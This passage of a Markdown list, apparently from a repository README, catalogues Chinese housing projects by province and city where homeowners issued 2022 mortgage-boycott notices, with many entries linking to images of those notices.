[็Ÿณๅฎถๅบ„่ตซ็Ÿณๅบœ](images/ๆฒณๅŒ—็œ/็Ÿณๅฎถๅบ„ๅธ‚/็Ÿณๅฎถๅบ„ๅธ‚่ตซ็Ÿณๅบœๅ…จไฝ“่ดงๆฌพไธšไธปๅผบๅˆถๅœ่ดงๅ‘Š็Ÿฅไนฆ.png), [ไผ—็พŽๅฎšๅˆถๅนฟๅœบ](images/ๆฒณๅŒ—็œ/็Ÿณๅฎถๅบ„ๅธ‚/_ไผ—็พŽๅฎšๅˆถๅนฟๅœบ) - **้‚ขๅฐๅธ‚๏ผˆ3๏ผ‰๏ผš** ๆ’ๅคงๆ‚ฆๅบœ, [ๅคฉๅฑฑ็†™ๆน–ไบŒๆœŸ_ๅ็Ž‰ๅฎถๅ›ญ๏ผˆๅพ…ๅœ่ดท๏ผ‰](images/ๆฒณๅŒ—็œ/้‚ขๅฐๅธ‚/ๅคฉๅฑฑ็†™ๆน–ไบŒๆœŸ_ๅ็Ž‰ๅฎถๅ›ญๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), ๆฐธๅบทไธ‡ๅ›ฝๅŸŽ - **ๅผ ๅฎถๅฃๅธ‚๏ผˆ2๏ผ‰๏ผš** ๅฎฃๅŒ–ๆ’ๅคงๆปจๆฒณๅทฆๅฒธ, ๅฎฃๅŒ–ๆ’ๅคง็ฟก็ฟ ๆนพ ### ๆฒณๅ—็œ [ 70 ] - **ๅฎ‰้˜ณๅธ‚๏ผˆ3๏ผ‰๏ผš** [ๆฒณๅ—ๅฎ‰้˜ณๆ’ๅคงๆœชๆฅๅŸŽ๏ผˆ8ๆœˆ๏ผ‰](images/ๆฒณๅ—็œ/ๅฎ‰้˜ณๅธ‚/_ๆฒณๅ—ๅฎ‰้˜ณๆ’ๅคงๆœชๆฅๅŸŽ), ๆ’ๅคงๆ‚ฆๅบœ, ็ดซ่–‡ๅ…ฌ้ฆ† - **้นคๅฃๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆท‡ๅŽฟๅปบไธšๅŸŽ](images/ๆฒณๅ—็œ/้นคๅฃๅธ‚/ๆฒณๅ—้นคๅฃๅธ‚ๆท‡ๅŽฟๅปบไธšๅŸŽๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jfif) - **ๅผ€ๅฐๅธ‚๏ผˆ3๏ผ‰๏ผš** [ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบๆœชๅๅบœไธ€ๆœŸ](images/ๆฒณๅ—็œ/ๅผ€ๅฐๅธ‚/ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบๆœชๅๅบœไธ€ๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด8ๆœˆไธ€ๆ—ฅๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), [ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบ็ดซๅขƒๅบœไบŒๆœŸ](images/ๆฒณๅ—็œ/ๅผ€ๅฐๅธ‚/ๅผ€ๅฐๅŒ—ๅคง่ต„ๆบ็ดซๅขƒๅบœไบŒๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด9ๆœˆไธ€ๆ—ฅๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), [้ƒ‘ๅผ€ๆ’ๅคงๆœชๆฅๅŸŽไธ‰ๆœŸ](images/ๆฒณๅ—็œ/ๅผ€ๅฐๅธ‚/้ƒ‘ๅผ€ๆ’ๅคงๆœชๆฅๅŸŽไธ‰ๆœŸๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด8ๆœˆไปฝๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๆด›้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงไบ‘ๆน–ไธŠ้ƒก - **ๆผฏๆฒณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงๆ‚ฆๅบœ - **ๅ—้˜ณๅธ‚๏ผˆ3๏ผ‰๏ผš** ๆ’ๅคงๅพกๅบœ, ๅ…ด่พพ็‘ๅบœ, ้˜ณๅ…‰ๅŸŽไธฝๆ™ฏ่Šฑๅ›ญ - **ๅ•†ไธ˜ๅธ‚๏ผˆ2๏ผ‰๏ผš** ๆ’ๅคงๅ้ƒฝไบŒๆœŸ, ๅ้—จๅŸŽไบ”ๆœŸ - **ๆ–ฐไนกๅธ‚๏ผˆ2๏ผ‰๏ผš** ๅนณๅŽŸๆ–ฐๅŒบๆ’ๅคงไธ‰ๆœŸๅŠๅŸŽๆน–๏ผˆ8ๆœˆ๏ผ‰, [ๆ–ฐไนกๅธ‚่ฑซ้ฃž็››ไธ–ๅŸŽ้‚ฆ๏ผˆ8ๆœˆ๏ผ‰](images/ๆฒณๅ—็œ/ๆ–ฐไนกๅธ‚/ๆ–ฐไนก่ฑซ้ฃž็››ไธ–ๅŸŽ้‚ฆ.jpg) - **่ฅ้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๅฑ…ๆ˜“่ฅฟ้ƒก - **่ฎธๆ˜Œๅธ‚๏ผˆ2๏ผ‰๏ผš** ้‡‘็ง‘้นฟ้ธฃๅธๆ™ฏ, ่žๅˆ›่ง‚ๆฒณๅฎธ้™ข - **้ƒ‘ๅทžๅธ‚๏ผˆ45๏ผ‰๏ผš** ๅฅฅๅ›ญ่ช‰ๆน–ๆนพ, ๅฅฅๅ›ญๆ‚ฆๅŸŽ๏ผˆๆฑ‡ๆ™ฏๅ›ญ๏ผ‰, [็€šๆตท่ˆชๅŸŽ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/็€šๆตท่ˆชๅŸŽๅ‘Š็Ÿฅไนฆ.png), ็€šๆตทๆ€ๅฟตๅŸŽ, ๆตฉๅˆ›ๆขงๆก่Œ—็ญ‘๏ผˆ7ๆœˆ๏ผ‰, ๆ’ๅคงๅŸŽ, ๆ’ๅคงๅ…ป็”Ÿ่ฐท, ๅŽ็บณ้พ™็†™ๆนพ, [้‡‘ๆฐดๅŒบๅบทๆกฅไธœ้บ“ๅ›ญไบŒๆœŸ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅธ‚้‡‘ๆฐดๅŒบๅบทๆกฅไธœ้บ“ๅ›ญไบŒๆœŸๅ…จไฝ“ไธšไธปไบŽ2022ๅนด10ๆœˆ1ๆ—ฅๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), ้”ฆ่‰บ่ฝป็บบๅ››ๆœŸๆœชๆฅๅ…ฌๅฏ“, [ไน่ฃ•้พ™ๅŸŽ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/ไน่ฃ•้พ™ๅŸŽ.jpeg), ๅบทๆกฅ็Ž–็Žบๅ›ญ, [ๅบทๆกฅ้‚ฃไบ‘ๆบช๏ผˆ8ๆœˆ)](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/ๆ–ฐ้ƒ‘้พ™ๆน–ๅบทๆกฅ้‚ฃไบ‘ๆบช.jpg), ๅบทๆกฅๆœชๆฅๅ…ฌๅ…ƒ, ๅบทๆกฅ้ฆ™ๆบช้ƒก, [ๅบทๆกฅๆ‚ฆๆบชๅ›ญ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅบทๆกฅๆ‚ฆๆบชๅ›ญ.png), ๅบทๆกฅ้˜…ๆบช้›…่‹‘, [ๅญ”้›€ๅŸŽๅ…ฌๅ›ญๆตท](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅญ”้›€ๅŸŽๅ…ฌๅ›ญๆตท.png), [่“ๅฎๆกƒๆบ้‡Œ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/่“ๅฎๆกƒๆบ้‡Œๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), ้พ™ๆน–้”ฆ่‰บๅŸŽ้ซ˜ๅ…ญ, ้พ™ๆน–ไธ€ๅท๏ผˆ9ๆœˆ๏ผ‰, ็ปฟๅœฐๆปจๆน–ๅ›ฝ้™…ๅŸŽ, ็ปฟๅœฐๅŸŽไบŒๅŒบ๏ผˆ7ๆœˆ๏ผ‰, [็ปฟๅœฐๅŸŽไบ”ๆœŸๅ…ญๅŒบ๏ผˆ7ๆœˆ๏ผ‰](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทž็ปฟๅœฐๅŸŽไบ”ๆœŸๅ…ญๅŒบๅœ่ดทๅฃฐๆ˜Ž.jpg), ็ปฟๅœฐๆบฑๆฐดๅฐ้•‡, ๅ้—จ็ฟ ๅ›ญ, ๅ้—จๅคฉๅขƒ, ๅ้—จ็ดซๅ›ญ, ๅ•Ÿ็ฆๅŸŽ, ๆธ…ๅŽๅŸŽ๏ผˆ7ๆœˆ๏ผ‰, [่žๅˆ›ไธญๅŽŸๅคง่ง‚ไบŒๆœŸ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅธ‚่žๅˆ›ไธญๅŽŸๅคง่ง‚ไบŒๆœŸๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), ็››ๆถฆๅŸŽๅฃนๅทๅ…ฌ้ฆ†, [็››ไธ–ๅง้พ™ๅŸŽไธ‰ๆœŸ๏ผˆ10ๆœˆ๏ผ‰](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅธ‚ไธญๅŽŸๅŒบ็››ไธ–ๅง้พ™ๅŸŽไธ‰ๆœŸ.jpg), [ๆณฐๅฑฑ่ช‰ๆ™ฏๆœ—่ช‰ๅ›ญ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/ๆณฐๅฑฑ่ช‰ๆ™ฏๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด9ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), [ๅจ้พ™ๅฐšๅ“13ๅทๆฅผ๏ผˆ10ๆœˆๅบ•ไธ‰ๆœŸ็ƒ‚ๅฐพไธ‰ๅนดๅœ่ดท๏ผ‰](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๆ–ฐ้ƒ‘ๅจ้พ™ๅฐšๅ“13ๅทๆฅผๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), [ๆ–ฐ้ƒ‘ๅธ‚ๆตฉๅˆ›ๅŸŽ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/ๆตฉๅˆ›ๅŸŽๅ‘Š็Ÿฅไนฆ.png), [้‘ซ่‹‘้‡‘ๆฐด่ง‚ๅŸŽ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๅธ‚้‘ซ่‹‘้‡‘ๆฐด่ง‚ๅŸŽ.jpg), [้‘ซ่‹‘ๅๅŸŽ3ๅท้™ขไฝๅฎ…](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทž้‘ซ่‹‘ๅๅŸŽ3ๅท้™ขไฝๅฎ…้กน็›ฎ.png), ๆฐธๆ’็†ๆƒณไธ–็•Œไธ‰ๆœŸ๏ผˆ9ๆœˆ๏ผ‰, [่ฑซๅ‘็™ฝ้นญๆบๆ˜ฅๆ™“ไธ‰ๆœŸ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทž่ˆช็ฉบๆธฏๅŒบ่ฑซๅ‘็™ฝ้นญๆบๆ˜ฅๆ™“ไธ‰ๆœŸๅ…จไฝ“ไธšไธปๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg), [ๆญฃๅ•†็Ž–ๅท้™ข](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/_ๆ–ฐ้ƒ‘ๅธ‚ๆญฃๅ•†๏ผˆ้พ™ๆน–๏ผ‰็Ž–ๅท้™ข), ้ƒ‘่ฅฟ้‘ซ่‹‘ๅๅฎถๅ››ๆœŸ๏ผˆ7ๆœˆ๏ผ‰, [้ƒ‘ๅทž่žๅˆ›ๅพกๆน–ๅฎธ้™ขไธ‰ๆœŸ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทž่žๅˆ›ๅพกๆน–ๅฎธ้™ขไธ‰ๆœŸ.png), [้ƒ‘ๅทžๆ–ฐ็”ฐๅŸŽๆน–ๅ…‰้‡ŒไบŒๆœŸ(ๅŽŸๆดžๆž—ๆ–‡่‹‘)](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทžๆ–ฐ็”ฐๅŸŽๆน–ๅ…‰้‡ŒไบŒๆœŸ๏ผˆๅŽŸๆดžๆž—ๆ–‡่‹‘๏ผ‰.jpg), [้ƒ‘ๅทž้‘ซ่‹‘ๅ›ฝ้™…ๆ–ฐๅŸŽ](images/ๆฒณๅ—็œ/้ƒ‘ๅทžๅธ‚/้ƒ‘ๅทž้‘ซ่‹‘ๅ›ฝ้™…ๆ–ฐๅŸŽ.jpg) - **ๅ‘จๅฃๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆงๅบœๅ…ญๅทไธ‰ๆœŸ - **้ฉป้ฉฌๅบ—ๅธ‚๏ผˆ5๏ผ‰๏ผš** [ๆ’ๅคงๆ‚ฆๅบœ](images/ๆฒณๅ—็œ/้ฉป้ฉฌๅบ—ๅธ‚/้ฉป้ฉฌๅบ—ๆ’ๅคงๆ‚ฆๅบœ.png), ไฝณๅ’Œๆ–ฐๅŸŽ, ๅนณ่ˆ†ๅŽฟๆน–็€่“ๅฒธ๏ผˆ10ๆœˆ๏ผ‰, ้‚ๅนณๅŽฟ็ปฟๅœฐ่‹‘, ไธญๅŽŸๅŸŽ ### ๆน–ๅŒ—็œ [ 25 ] - **้„‚ๅทžๅธ‚๏ผˆ3๏ผ‰๏ผš** ้„‚ๅทžๅธ‚่Šฑๆ ทๅนด้ฆ™้—จ็ฌฌ, ๆ’ๅคง็ซฅไธ–็•Œๅ››ๅทๅœฐ๏ผˆๅปŠๆกฅๆฐดไนก๏ผ‰๏ผˆ9ๆœˆ๏ผ‰, ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ - **่†้—จๅธ‚๏ผˆ1๏ผ‰๏ผš** ๅฎžๅœฐ็ดซ่–‡้›…่‘— - **้šๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงๆ‚ฆ้พ™ๅฐ๏ผˆ10ๆœˆ๏ผ‰ - **ๆญฆๆฑ‰ๅธ‚๏ผˆ14๏ผ‰๏ผš** [ๅฅฅๅฑฑๆฑ‰ๅฃๆพŽๆนƒๅŸŽ](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๆญฆๆฑ‰ไธœ่ฅฟๆน–ๅฅฅๅฑฑๆฑ‰ๅฃๆพŽๆนƒๅŸŽ.jpg), ๅฅฅๅฑฑ็ปๅผ€ๆพŽๆนƒๅŸŽ๏ผˆ7ๆœˆ๏ผ‰, [ๅฅฅๅฑฑ้ฆ–ๅบœ](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๅฅฅๅฑฑ้ฆ–ๅบœ๏ผˆๅฅฅๅฑฑ้ƒก๏ผ‰.png), [ๅฝ“ไปฃ้“ญๅฑฑ็ญ‘(ไบบ็ฆๅ›ฝ้™…ๅฅๅบทๅŸŽ)๏ผˆ7ๆœˆ๏ผ‰](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ไบบ็ฆๅ›ฝ้™…ๅฅๅบทๅŸŽ.png), [ๅ…‰่ฐท็ปฟๅœฐไธญๅฟƒๅŸŽJKLๅœฐๅ—](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๅ…‰่ฐท็ปฟๅœฐไธญๅฟƒๅŸŽJKLๅœฐๅ—.png), [ๆฑ‰ๅ—็ปฟๅœฐๅŸŽไบŒๆœŸ](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๆฑ‰ๅ—็ปฟๅœฐๅŸŽไบŒๆœŸ.png), [ๆ’ๅคง็ง‘ๆŠ€ๅŸŽ๏ผˆ8ๆœˆ๏ผ‰](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๆ’ๅคง็ง‘ๆŠ€ๆ—…ๆธธๅŸŽ.png), [ๆ’ๅคง้พ™ๅŸŽๅ››ๆœŸ](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๆ’ๅคง้พ™ๅŸŽๅ››ๆœŸ.png), [ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ๏ผˆ8ๆœˆ๏ผ‰](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/ๆ’ๅคงๆ—ถไปฃๆ–ฐๅŸŽ.png), [็ปฟๅœฐๅ…‰่ฐทๆ˜Ÿๆฒณ็ป˜](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/็ปฟๅœฐๅ…‰่ฐทๆ˜Ÿๆฒณ็ป˜.jpg), ็ปฟๅœฐๅ…‰่ฐทไธญๅฟƒๅŸŽ, [็พŽๅฅฝ้ฆ™ๅŸŸ่Šฑๅขƒ](images/ๆน–ๅŒ—็œ/ๆญฆๆฑ‰ๅธ‚/็พŽๅฅฝ้ฆ™ๅŸŸ่Šฑๅขƒ.jpg), ๆณฐ็ฆพ็Ÿฅ้Ÿณๆน–้™ขๅญ๏ผˆๅ›ๆ‚ฆ่Šฑๅ›ญ๏ผ‰, ๆ–ฐๆดฒไธญๆ–ฐ็››ๆ™ฏ - **ๅ’ธๅฎๅธ‚๏ผˆ3๏ผ‰๏ผš** ๆ’ๅคงๅ้ƒฝ, ่”ไนๅนฟๅœบ, ็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™ - **่ฅ„้˜ณๅธ‚๏ผˆ2๏ผ‰๏ผš** ๆ’ๅคง็ฟก็ฟ ้พ™ๅบญไธ€ๆœŸ๏ผˆ8ๆœˆ๏ผ‰, ่“ๅ…‰้›้”ฆๅ›ญ - **ๅญๆ„Ÿๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆถฆ่พพยทๅฃนๅทๅนฟๅœบ ### ๆน–ๅ—็œ [ 34 ] - **ๅธธๅพทๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆฑ‰ๅฏฟๅŽฟๅฑฑๆน–ๆตทไธŠๅŸŽไบŒๆœŸใ€ไธ‰ๆœŸ](images/ๆน–ๅ—็œ/ๅธธๅพทๅธ‚/ๅธธๅพทๅธ‚ๆฑ‰ๅฏฟๅŽฟๅฑฑๆน–ๆตทไธŠๅŸŽไบŒๆœŸใ€ไธ‰ๆœŸๅ…จไฝ“ไธšไธปๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg) - **้ƒดๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** [้ƒดๅทž้ฒฒ้นๅ•†่ดธๅŸŽ](images/ๆน–ๅ—็œ/้ƒดๅทžๅธ‚/้ƒดๅทž้ฒฒ้นๅ•†่ดธๅŸŽๅผบๅˆถๅœ่ดท้€š็Ÿฅ.png) - **่กกไธœๅŽฟ๏ผˆ1๏ผ‰๏ผš** ๅฅฅไฝ“ๅ…ฌ้ฆ† - **่กก้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๅŽๆบๅŒ—่ก— - **ๆ€€ๅŒ–ๅธ‚๏ผˆ2๏ผ‰๏ผš** ๆ’ๅคงๅธๆ™ฏ, ๆ’ๅคงไธญๅคฎๅนฟๅœบ๏ผˆ8ๆœˆ๏ผ‰ - **ๆต้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงๅŽๅบœๅ››ๆœŸ - **้‚ต้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงๅŽๅบœ๏ผˆ9ๆœˆ๏ผ‰ - **ๆน˜ๆฝญๅธ‚๏ผˆ4๏ผ‰๏ผš** [ๅ’Œ่พพๆปจๆฑŸๅ…ฌๅ›ญ](images/ๆน–ๅ—็œ/ๆน˜ๆฝญๅธ‚/ๆน˜ๆฝญๅธ‚ๅ’Œ่พพๆปจๆฑŸ่Šฑๅ›ญๅผบๅˆถๅœ่ดทไนฆ.jpg), ๆ’ๅคงไนฆ้ฆ™้—จ็ฌฌ15ใ€16ๆ ‹, [้‡‘ๅฅฅๆน˜ๆฑŸๅ…ฌ้ฆ†](images/ๆน–ๅ—็œ/ๆน˜ๆฝญๅธ‚/ๆน˜ๆฝญ้‡‘ๅฅฅๆน˜ๆฑŸๅ…ฌ้ฆ†ไธ€ไบŒๆœŸๅœ่ดทๅ‘Š็Ÿฅๅ‡ฝ.jpg), ๆน˜ๅฐๅ›ฝ้™…่Šฑๅ›ญไบŒๆœŸ - **ๆฐธๅทžๅธ‚๏ผˆ2๏ผ‰๏ผš** [้“ๅŽฟไธœๆ–นไธฝ้ƒฝไธ‰ๆœŸ๏ผˆๆฐธๅทž้“ๅŽฟ๏ผ‰](images/ๆน–ๅ—็œ/ๆฐธๅทžๅธ‚/ๅ…ณไบŽ้“ๅŽฟไธœๆ–นไธฝ้ƒฝๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png), ่ˆœๅพทๆน˜ๆฑŸ - **ๅฒณ้˜ณๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงๆœชๆฅๅŸŽไบŒๆœŸ๏ผˆ8ๆœˆ๏ผ‰ - **้•ฟๆฒ™ๅธ‚๏ผˆ11๏ผ‰๏ผš** ๆปจๆฑŸๆญฃ่ฃ็ดซ้˜™ๅฐ, [ๅฏŒๅŠ›ๅ›ญๅบทๅ•†ไธšๅนฟๅœบ](images/ๆน–ๅ—็œ/้•ฟๆฒ™ๅธ‚/้•ฟๆฒ™ๅฏŒๅŠ›ๅ›ญๅบทๅ•†ไธšๅนฟๅœบๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด11ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpeg), ๅˆ่ƒฝๆžซไธนๅฎธๆ‚ฆ, ๅˆ่ƒฝๆน˜ๆฑŸๅ…ฌ้ฆ†, ๆ’ๅคงๆปจๆฑŸๅทฆๅฒธ, ๆ’ๅคงๅพกๆ™ฏๅคฉไธ‹ไบŒๆœŸ๏ผˆ8ๆœˆ๏ผ‰, ๆ’ๅคงๆ‚ฆๆน–ๅ•†ไธšๅนฟๅœบ๏ผˆ12ๆœˆ๏ผ‰, [ๆ’ๆณฐ่Š™่“‰ๆ‚ฆๅบœ](images/ๆน–ๅ—็œ/้•ฟๆฒ™ๅธ‚/ๆน–ๅ—็œ้•ฟๆฒ™ๅธ‚ๆ’ๆณฐ่Š™่“‰ๆ‚ฆๅบœๅ…จไฝ“ไธšไธปๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg), [ๅฎไนกๆœชๆฅๆ–น่ˆŸ2ๆœŸ&3ๆœŸ](images/ๆน–ๅ—็œ/้•ฟๆฒ™ๅธ‚/ๅฎไนกๆœชๆฅๆ–น่ˆŸ.jpg), ๆ–ฐๅŠ›้“‚ๅ›ญ๏ผˆ8ๆœˆ๏ผ‰, ้•ฟๆฒ™ๆ–‡ๆ™ฏ - **ๆ ชๆดฒๅธ‚๏ผˆ8๏ผ‰๏ผš** ๅŒ—ๅคง่ต„ๆบ็ฟก็ฟ ๅ…ฌๅ›ญ, ่ฏšๅปบๆช€้ฆ™ๅฑฑ, [ไธœๆˆไธญๅฟƒ1ๆ ‹](images/ๆน–ๅ—็œ/ๆ ชๆดฒๅธ‚/ๆ ชๆดฒไธœๆˆไธญๅฟƒ1ๆ ‹ๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด9ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.jpg), [ๅŽๆ™จๆ ผๆž—ๆฐดๅฒธไบŒไธ‰ๆœŸ](images/ๆน–ๅ—็œ/ๆ ชๆดฒๅธ‚/ๆน–ๅ—็œๆ ชๆดฒๅธ‚ๅŽๆ™จๆ ผๆž—ๆฐดๅฒธไบŒไธ‰ๆœŸ.png), [ๅŽๆ™จ้‡‘ๆฐดๆนพไธ‰ๅ››ๆœŸ](images/ๆน–ๅ—็œ/ๆ ชๆดฒๅธ‚/ๆน–ๅ—ๆ ชๆดฒ.jpg), [ๅŽๆ™จ็ฅžๅ†œๅบœ](images/ๆน–ๅ—็œ/ๆ ชๆดฒๅธ‚/ๆ ชๆดฒๅธ‚ๅŽๆ™จ็ฅžๅ†œๅบœๅ…จไฝ“ไธšไธปๅผบๅˆถๅœ่ดงๅ‘Š็Ÿฅไนฆ.jpeg), ๅŽๆ™จ็ฅžๅ†œๆนพ, ็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™ ### ๅ‰ๆž—็œ [ 1 ] - **ๅ…ฌไธปๅฒญๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคง่Šฑๆบช่ฐทๆˆ–ๆฐดไธ–็•Œ ### ๆฑŸ่‹็œ [ 12 ] - **ๅธธๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** ไธ‰็››็’žๆ‚ฆๆนพ - **่ฟžไบ‘ๆธฏๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆ’ๆณฐๆ‚ฆ็‘ๅบœ](images/ๆฑŸ่‹็œ/่ฟžไบ‘ๆธฏๅธ‚/ๆ’ๆณฐๆ‚ฆ็‘ๅบœ.png) - **ๅ—ไบฌๅธ‚๏ผˆ1๏ผ‰๏ผš** [้‡‘้™ตๅŽๅคไธญๅฟƒ๏ผˆ8ๆœˆ๏ผ‰](images/ๆฑŸ่‹็œ/ๅ—ไบฌๅธ‚/ๅ—ไบฌๅธ‚้‡‘้™ตๅŽๅคไธญๅฟƒๆ–‡ๆธŠๅบœ1ใ€2ๆ ‹ๅ…จไฝ“ไธšไธปๅ†ณๅฎšไบŽ2022ๅนด8ๆœˆๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๅ—้€šๅธ‚๏ผˆ1๏ผ‰๏ผš** ้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆ - **่‹ๅทžๅธ‚๏ผˆ2๏ผ‰๏ผš** [ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ๏ผˆ8ๆœˆ)](images/ๆฑŸ่‹็œ/่‹ๅทžๅธ‚/่‹ๅทžๆณฐ็ฆพ้‡‘ๅฐŠๅบœ.jpg), [้˜ณๅ…‰ๅŸŽๆช€่‹‘](images/ๆฑŸ่‹็œ/่‹ๅทžๅธ‚/่‹ๅทž้˜ณๅ…‰ๅŸŽๆช€่‹‘.jpg) - **ๅฎฟ่ฟๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงๆ‚ฆๆพœๆนพ - **ๆณฐๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** ๆ’ๅคงๅพกๆ™ฏๅŠๅฒ› - **ๆ— ้”กๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๅคฉๆธ้ช„ๅ›ญ](images/ๆฑŸ่‹็œ/ๆ— ้”กๅธ‚/wuxi_ๅคฉๆธ้ช„ๅ›ญ.png) - **ๆ‰ฌๅทžๅธ‚๏ผˆ1๏ผ‰๏ผš** [ๆ’ๅคง่ง‚ๆพœๅบœ](images/ๆฑŸ่‹็œ/ๆ‰ฌๅทžๅธ‚/ๆ‰ฌๅทžๆ’ๅคง่ง‚ๆพœๅบœ.jpg) - **้•‡ๆฑŸๅธ‚๏ผˆ2๏ผ‰๏ผš** ๆ’ๅคง็ซฅไธ–็•Œ, [ๅฅๅฎนๅธ‚ๅฎๅŽ้•‡ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ](images/ๆฑŸ่‹็œ/้•‡ๆฑŸๅธ‚/้•‡ๆฑŸๅธ‚ๅฅๅฎนๅธ‚ๅฎๅŽ้•‡-ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ.jpg) ### ๆฑŸ่ฅฟ็œ [ 15 ] - **่ตฃๅทžๅธ‚๏ผˆ2๏ผ‰๏ผš** ็ปฟๅœฐๅš่งˆๅŸŽ, [ไบŽ้ƒฝๅŽฟๆ’ๅคงๅพกๆ™ฏๅŒ—ๅŒบ](images/ๆฑŸ่ฅฟ็œ/่ตฃๅทžๅธ‚/่ตฃๅทžๅธ‚ไบŽ้ƒฝๅŽฟๆ’ๅคงๅพกๆ™ฏๅŒ—ๅŒบไธšไธปๅผบๅˆถๅœ่ดทๅ‘Š็Ÿฅไนฆ.png) - **ๆ™ฏๅพท้•‡ๅธ‚๏ผˆ3๏ผ‰๏ผš** ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ, ๆ’ๅคง็‘ๅบญ, ๆ’ๅคงๆ‚ฆๅบœ - **ๅ—ๆ˜Œๅธ‚๏ผˆ6๏ผ‰๏ผš** ๆ’ๅคง็บๅบญ๏ผˆ8ๆœˆ๏ผ‰, ๆ’ๅคงๆž—ๆบชๅบœ๏ผˆ10ๆœˆ๏ผ‰, ้ธฟๆตทๅŸŽ๏ผˆ10ๆœˆ๏ผ‰, 